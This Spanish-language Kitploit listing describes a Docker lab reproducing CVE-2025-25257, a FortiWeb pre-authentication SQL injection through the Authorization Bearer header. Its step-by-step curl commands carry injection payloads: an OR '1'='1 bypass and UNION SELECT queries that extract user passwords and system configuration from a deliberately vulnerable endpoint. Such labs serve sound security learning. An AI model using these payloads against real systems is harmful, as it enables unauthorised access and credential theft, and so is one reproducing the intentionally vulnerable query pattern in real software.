Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-25257 | Kitploit
Herramientas/GitHubGitHub/lytianahkone-boop/cve-2025-25257
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónSeguridad de Bases de DatosLabs y Práctica
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-25257 - Entorno de Experimentación

Arquitectura de la Experimentación (el entorno simula los componentes vulnerables de FortiWeb)

root@kitploit:~
Endpoint vulnerable : /api/system/fabric/config
Vector de inyección : Header HTTP Authorization: Bearer
Mecanismo : Concatenación SQL directa (f-string de Python)
Autenticación : Ninguna (bypass total)
Base de datos : SQLite (para demostración)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile : servicio http vulnerable de forma intencionada / expone una API explotable sin autenticación

docker-compose.yml : orquesta un servicio vulnerable reproducible / expone la API atacable mediante http / aísla el entorno de experimentación

requirements.txt : garantiza un entorno estable y reproducible

app.py : implementa un endpoint pre-autenticación / acepta una entrada de usuario mediante Authorization / concatena esa entrada en una consulta SQL / permite el bypass de autenticación y la extracción de datos

init_db.py : prepara un conjunto de datos explotable / permite una demostración clara del bypass de autenticación y de la exfiltración de datos

payload.txt proporciona una prueba mínima, controlada y observable de ejecución de código

Paso 1: Construir y lanzar el contenedor

Construcción de la imagen Docker

docker-compose build

Inicio del contenedor

docker-compose up -d

Verificar que el contenedor está activo

docker-compose ps

Consultar los logs

docker-compose logs -f

Paso 2: Verificar la accesibilidad del servicio

curl http://localhost:8080/api/system/status

Paso 3: Explotación de la vulnerabilidad

Consulta no maliciosa

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

Inyección de consulta SQL maliciosa Bypass con OR 1=1

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

Extracción de datos con inyección UNION-SELECT

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

Exfiltración de datos sensibles

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

Paso 4: Limpieza y detención

Detener el contenedor

docker-compose down

Eliminar los volúmenes

docker-compose down -v

Eliminar la imagen

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

Descargar herramienta